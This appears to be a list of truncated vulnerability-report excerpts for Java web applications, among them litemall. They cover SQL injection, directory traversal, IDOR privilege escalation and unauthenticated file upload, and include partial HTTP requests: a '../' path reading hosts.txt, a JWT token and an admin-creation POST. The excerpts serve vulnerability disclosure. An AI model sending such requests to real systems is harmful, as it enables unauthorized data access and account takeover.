SQL injection vulnerability in linlinjava litemall v.1.8.0 allows a remote attacker to obtain sensitive information via the goodsId, goodsSn, name parameters of the AdminOrderController.java component. 1. Steps to reproduce: visit goods management, enter 1 in the nickname field...
Directory traversal vulnerability in UploadController.java `GET /upload/file/2024/11/20/1859180710022115329.png/../../../../hosts.txt HTTP/1.1 Host: localhost:8101 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111...
IDOR vertical privilege escalation vulnerability in ExamController.java 1. Log in with student privileges, get low-privilege user cookies `token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzIxOTYzMDAsInVzZXJuYW1lIjoidGVzdCJ9.ncdRy80InTK5kEbchFSKwHVXz5SnxjpoKlAyxGmtZ4Y` 2. Vulnerable interface: adding an administrator account `POST /exam/api/sys/user/save HTTP/1.1 Host: 192.168.4.221:8101 Content-Length:...
UploadController.java unauthorized file upload: no permission verification `POST /tianti_module_admin_war/upload/ajax/upload_file HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 182 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:8000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0IMnvEkpJQueVY9 User-Agent:...